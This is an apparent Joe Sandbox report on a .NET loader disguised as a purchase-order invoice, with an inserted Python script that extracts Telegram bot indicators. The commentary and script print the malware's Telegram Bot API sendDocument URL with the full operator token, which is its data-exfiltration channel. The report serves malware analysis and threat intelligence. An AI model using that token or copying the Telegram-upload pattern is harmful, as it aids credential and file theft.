Name: https://account.dyn.com/ | Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://api.telegram.org | Source: jsc.exe, 00000003.00000002.3307185247.0000000002AE6000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://api.telegram.org | Source: jsc.exe, 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: jsc.exe, 00000003.00000002.3307185247.0000000002AE6000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high

The "Malicious: false" flags reflect the reputation of the host, not of the sample's use of it: api.telegram.org is a legitimate service, which is exactly why the Telegram Bot API is attractive as a C2 channel. The bot URL with the same token appears in the loader's memory and in both jsc.exe regions, which ties the injected payload's sendDocument upload to the loader's embedded configuration. The upx.sf.net string comes from Amcache.hve (the analysis host's hive), not from the sample, and the schemas.xmlsoap.org URL is a stock .NET claims-identity constant.
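Because the C2 indicator here is a URL that embeds the operator's bot token, the useful IOC processing is to recognise the token, record which Bot API methods were observed (sendDocument is the file-upload method, i.e. the exfiltration call) and produce a defanged form for reporting. The script below is an added example, not part of the Joe Sandbox report: the input list is constructed from the URL strings on this page, and the token shape (a numeric bot id, a colon, and a 35-character secret over [A-Za-z0-9_-]) is the publicly documented Telegram Bot API format.

```python
"""Pull Telegram Bot API indicators out of URL strings recovered from a sample and its memory."""
import re
from urllib.parse import urlsplit

# Bot tokens are "<numeric bot id>:<35-character secret over [A-Za-z0-9_-]>"; the Bot API
# carries the token in the path as /bot<token>/<method>.
TOKEN_RE = re.compile(r"bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")

# Constructed input: the URL strings the report lists for the loader and for jsc.exe.
STRINGS = [
    "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument",
    "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/",
    "https://api.telegram.org",
    "http://api.telegram.org",
    "https://account.dyn.com/",
]

# Bot API methods that push data to the operator's chat.
UPLOAD_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}


def defang(url):
    """hxxps://api[.]telegram[.]org/... so the indicator cannot be clicked or auto-linked."""
    p = urlsplit(url)
    scheme = {"http": "hxxp", "https": "hxxps"}.get(p.scheme, p.scheme)
    return f"{scheme}://{p.netloc.replace('.', '[.]')}{p.path}"


def telegram_iocs(strings):
    """Group api.telegram.org references by bot token and note which API methods were seen.
    References to the host without a token are kept separately: on their own they only
    prove the code talks to Telegram, not which bot it talks to."""
    bots, bare_hosts = {}, []
    for s in strings:
        p = urlsplit(s)
        if p.netloc.lower() != "api.telegram.org":
            continue
        m = TOKEN_RE.search(p.path)
        if not m:
            bare_hosts.append(defang(s))
            continue
        entry = bots.setdefault(m["bot_id"], {
            "token": f"{m['bot_id']}:{m['secret']}",  # the full token is the pivot/takedown IOC
            "methods": set(), "urls": [], "uploads_data": False})
        method = p.path[m.end():].strip("/")
        if method:
            entry["methods"].add(method)
            entry["uploads_data"] = entry["uploads_data"] or method in UPLOAD_METHODS
        entry["urls"].append(defang(s))
    return {"bots": bots, "bare_hosts": bare_hosts}


if __name__ == "__main__":
    for bot_id, entry in telegram_iocs(STRINGS)["bots"].items():
        print(bot_id, sorted(entry["methods"]), entry["uploads_data"], entry["urls"])
```

Against the strings on this page the result is a single bot (id 7017233680) with one observed method, sendDocument, so the exfiltration path is file upload to the operator's chat; the two bare api.telegram.org strings are recorded but carry no attribution on their own. The full token is kept in the output deliberately: it is what you search other samples for and what you report to Telegram for takedown.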
Contacted IPs

IP: 149.154.167.220 | Domain: api.telegram.org | Country: United Kingdom | ASN: 62041 | ASN name: TELEGRAMRU | Malicious: false
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1431985
                                      Start date and time:2024-04-26 07:39:07 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 48s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:PO-inv-CQV20(92315).exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@7/5@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 89%
                                      • Number of executed functions: 84
                                      • Number of non-executed functions: 8
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
07:40:01 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      149.154.167.220o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                        UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                          Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                            DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                              17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                  Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                    X1.exeGet hashmaliciousXWormBrowse
                                                      Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                        X2.exeGet hashmaliciousXWormBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          api.telegram.orgo3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 149.154.167.220
                                                          UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                          • 149.154.167.220
                                                          Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 149.154.167.220
                                                          explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                          • 149.154.167.220
                                                          X1.exeGet hashmaliciousXWormBrowse
                                                          • 149.154.167.220
                                                          Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                          • 149.154.167.220
                                                          | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                                                          | TELEGRAMRU | o3KyzpE7F4.ps1 | malicious | AgentTesla, PureLog Stealer | 149.154.167.220 |
                                                          |  | http://rfpteams.ksplastlc.net | malicious | Unknown | 149.154.167.99 |
                                                          |  | UMJLhijN4z.exe | malicious | AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer | 149.154.167.220 |
                                                          |  | Proforma Request.exe | malicious | AgentTesla | 149.154.167.220 |
                                                          |  | DHL EXPRESS.exe | malicious | AgentTesla | 149.154.167.220 |
                                                          |  | 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe | malicious | AgentTesla | 149.154.167.220 |
                                                          |  | e-dekont.exe | malicious | AgentTesla | 149.154.167.220 |
                                                          |  | Reconfirm Details.vbs | malicious | AgentTesla | 149.154.167.220 |
                                                          |  | X1.exe | malicious | XWorm | 149.154.167.220 |
                                                          |  | Output.exe | malicious | RedLine, XWorm | 149.154.167.220 |
                                                          | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                                                          | 3b5074b1b5d032e5620f69f9f700ff0e | a.cmd | malicious | Unknown | 149.154.167.220 |
                                                          |  | http://papajoeschicago.com | malicious | Unknown | 149.154.167.220 |
                                                          |  | https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1 | malicious | Unknown | 149.154.167.220 |
                                                          |  | o3KyzpE7F4.ps1 | malicious | AgentTesla, PureLog Stealer | 149.154.167.220 |
                                                          |  | https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== | malicious | HTMLPhisher | 149.154.167.220 |
                                                          |  | http://wsj.pm | malicious | NetSupport RAT | 149.154.167.220 |
                                                          |  | Isass.exe | malicious | Unknown | 149.154.167.220 |
                                                          |  | https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw== | malicious | HTMLPhisher | 149.154.167.220 |
                                                          |  | SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220 |
                                                          |  | Minutes_of_15th_Session_of_PSC.pdf.exe | malicious | Unknown | 149.154.167.220 |
                                                          No context
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.0155096525248184
                                                          Encrypted:false
                                                          SSDEEP:192:qU3woh68AHs0UnUItQaWYsT+GzuiFpZ24lO8cLi:Oo5AHUnUlaDsSGzuiFpY4lO81
                                                          MD5:4BFD9F224B40E114C9B202B4364A38DD
                                                          SHA1:4DFBDBDBE70C4C3DF2839D06373F79E747033ACF
                                                          SHA-256:6CF50F72C56CECD502CFECE1FB85E02172A9C5507A580BC7099E258CAFAAC278
                                                          SHA-512:7EE3F963A1CAC4EE8664A855F9B3D39FA5D65A6248D432E9B8852FD612BB15FD9C36208A41DF9EC74EC597B469D85974F9D7B6C888C6D5C19B37114B39E6179E
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.5.9.6.5.8.6.7.8.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.5.9.7.3.0.5.5.4.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.e.b.4.c.c.2.-.0.f.7.f.-.4.d.1.f.-.8.8.d.3.-.6.6.a.8.7.c.f.0.7.1.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.4.b.4.0.7.7.-.8.3.6.6.-.4.6.4.6.-.8.1.a.b.-.9.d.5.5.2.f.9.9.7.0.d.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.P.O.-.i.n.v.-.C.Q.V.2.0.(.9.2.3.1.5.)...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.p.a.t.a.n.a.n.e.p.a.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.b.0.-.0.0.0.1.-.0.0.1.5.-.5.c.3.4.-.8.0.2.a.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.6.a.5.0.a.7.e.e.0.5.9.2.a.e.e.7.e.3.c.f.b.b.e.9.9.0.b.e.e.9.0.0.0.0.0.0.0.0.!.0.0.0.0.e.0.2.d.c.7.4.b.a.a.e.8.2.1.c.9.1.f.1.2.c.8.9.0.d.b.5.9.5.f.9.b.0.8.d.b.4.1.8.c.!.P.O.
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:Mini DuMP crash report, 16 streams, Fri Apr 26 05:39:56 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):422156
                                                          Entropy (8bit):3.302651852752115
                                                          Encrypted:false
                                                          SSDEEP:3072:QG+Lv+IY5lFE4GjW7foFZwcSYsAFtLW1CCqEQ23+v8KkNgF:R+z+I1u7f08jLqb23Q8t
                                                          MD5:9DABFE1720A1B3F1325E0BDBE94CA0DD
                                                          SHA1:694B73039328EF5F02A572949306CF058DA69E62
                                                          SHA-256:8FC1F066AEF3FC0A35E0D4FCC857CA12645469293E2D6EBB7440DC31CCD42DF7
                                                          SHA-512:B1B02E5474F896DEDF2FF8BCD31020F059E9CD595B9A2D1D9276801652D76877B1CD3571B97E182B2A9BF979B494BE8D598DD20F7B4A984D108BC40F720103C9
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... .......,>+f........................l...4.......$........................H..nz..........l.......8...........T............*..|F..........\8..........H:..............................................................................eJ.......:......Lw......................T...........*>+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8642
                                                          Entropy (8bit):3.7166346998819466
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJbBdjDKeN6Y2D+lVvgmfZCL3prt89bz7+fPgxm:R6lXJzWeN6YTlVgmf4Lgzifj
                                                          MD5:A419BF5E35585727C3FD586F30413A50
                                                          SHA1:B130AF49E3EF6BC972045D60E11D0270575D1DE3
                                                          SHA-256:48E858C2B702070876287033F5265CE3385DE9FD89B9F320BB6AB1CC28AE97C7
                                                          SHA-512:892B81F0489C1ED4F5F2AB2AD019ED4EC80D6780439B3D29E6B698C7730E2A389E9ED7628770E715FC39BED4235F9E46B03A9340994D0F731112ED38A943F30B
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.0.<./.P.i.
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4812
                                                          Entropy (8bit):4.552953523927031
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsfJg771I9rIWpW8VYAmn0Ym8M4Jw8yLqDFWIyq85lhxv/GgFSCjsid:uIjfBI7wh7VIBJwP/IGtGeSCjzd
                                                          MD5:5074B24B2DE461996395C73505D1B952
                                                          SHA1:C869936549499F07E672BE25E1AB234012EF25D2
                                                          SHA-256:A9CEEC00382A7D4BBE1BC2AC763D6E6D0CA1D1BBD679415ED2CAF7654741A918
                                                          SHA-512:478E92BDA330C74A648EC0B0F8F2C382710CF803DF132C1ED34A95A77999BFEC01FC5C21F6A493E1B921AB9E5DB099D78B407D49EFA51047B6C8A192E3D5B9EB
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296442" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.469280831893493
                                                          Encrypted:false
                                                          SSDEEP:6144:BIzZfpi6ceLPx9skLmb0fHZWSP3aJG8nAgeiJRMMhA2zX4WABluuNvjDH5S:MZHtHZWOKnMM6bFp1j4
                                                          MD5:7F976650912F9473DFDD405669B08EC2
                                                          SHA1:A92858DAE348496707090CA20DD63B825C240B9E
                                                          SHA-256:F610FC7BB336C1F306BAC3678C724E176A38136B5010D9E6CC093C965D3478CF
                                                          SHA-512:6BC850B3E5FF814328CF81E4CBA5C78408CE9739068BBA79E7000E34F952F3C2BA6F981D55EE4E9DE56E4B52AAAB8B959B86AAECC99E72D4E5FF6B15FD304775
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...+.................................................................................................................................................................................................................................................................................................................................................R..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.590640443822455
                                                          TrID:
                                                          • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                          • Win64 Executable Console (202006/5) 47.64%
                                                          • Win64 Executable (generic) (12005/4) 2.83%
                                                          • Generic Win/DOS Executable (2004/3) 0.47%
                                                          • DOS Executable Generic (2002/1) 0.47%
                                                          File name:PO-inv-CQV20(92315).exe
                                                          File size:1'012'108 bytes
                                                          MD5:4e62c4b92779d99998cd908a0966bf7d
                                                          SHA1:e02dc74baae821c91f12c890db595f9b08db418c
                                                          SHA256:3c54f1e2d58d392a6bcd2e6c836d1479888e3c334b8e6f5511a65bc1506681fb
                                                          SHA512:b563249ab296c423529877328c34e90d8437247d4e43c6122eb9c9732af33008ccff6b820fca91c1620a7039744964cfd9114d9430bc81444df07682306a0d3c
                                                          SSDEEP:24576:4wj9VEAwjUNroBr4eL7Wvmnn30lasPZTJOsdKknLimo/agStPTn:VE4NUBrd7xn30lXPZTx7Gj5Gb
                                                          TLSH:8F25E061D61CDEABE42E4038D95345C0317AC349B3EA9E7E04CEA159A48335731BBE9F
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....k..........."...0.O................ ....@...... ..............................~.....`................................
                                                          Icon Hash:a2a286bcb4c6721a
                                                          Entrypoint:0x400000
                                                          Entrypoint Section:
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows cui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0xB06BE3BE [Wed Oct 17 15:31:10 2063 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:
                                                          Instruction
                                                          dec ebp
                                                          pop edx
                                                          nop
                                                          add byte ptr [ebx], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax+eax], al
                                                          add byte ptr [eax], al
                                                          | Name | Virtual Address | Virtual Size | Is in Section |
                                                          | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x50000 | 0x191ca | .rsrc |
                                                          | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4f08e | 0x38 | .text |
                                                          | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |  |
                                                          | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text |
                                                          | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |  |
                                                          | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                                          | .text | 0x2000 | 0x4d14f | 0x4d200 | 74eb8fd652fa23fc8681b68fd3390bfe | False | 0.5219180510534847 | data | 6.370516560098679 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
                                                          | .rsrc | 0x50000 | 0x191ca | 0x19200 | 262705e5684d8496c974907e1f2ed161 | False | 0.21495063743781095 | data | 4.534060482385922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                                                          | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                                                          | RT_ICON | 0x5021c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 |  |  | 0.7074468085106383 |
                                                          | RT_ICON | 0x50684 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 |  |  | 0.4474671669793621 |
                                                          | RT_ICON | 0x5172c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 |  |  | 0.32271784232365147 |
                                                          | RT_ICON | 0x53cd4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 |  |  | 0.26771374586679264 |
                                                          | RT_ICON | 0x57efc | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 |  |  | 0.1648970779604874 |
                                                          | RT_GROUP_ICON | 0x68724 | 0x4c | data |  |  | 0.75 |
                                                          | RT_VERSION | 0x68770 | 0x438 | data |  |  | 0.47685185185185186 |
                                                          | RT_VERSION | 0x68ba8 | 0x438 | data | English | United States | 0.4777777777777778 |
                                                          | RT_MANIFEST | 0x68fe0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347 |
                                                          | Language of compilation system | Country where language is spoken |
                                                          | English | United States |
                                                          | Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
                                                          | 04/26/24-07:39:59.187251 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                          | Apr 26, 2024 07:39:58.267694950 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:58.267718077 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:58.267853975 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:58.277611971 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:58.277625084 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:58.778444052 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:58.778511047 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:58.782738924 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:58.782744884 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:58.783071995 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:58.826880932 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:58.836642981 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:58.884155035 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:59.187115908 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:59.187150955 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:59.237672091 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:59.280019999 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:59.480964899 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
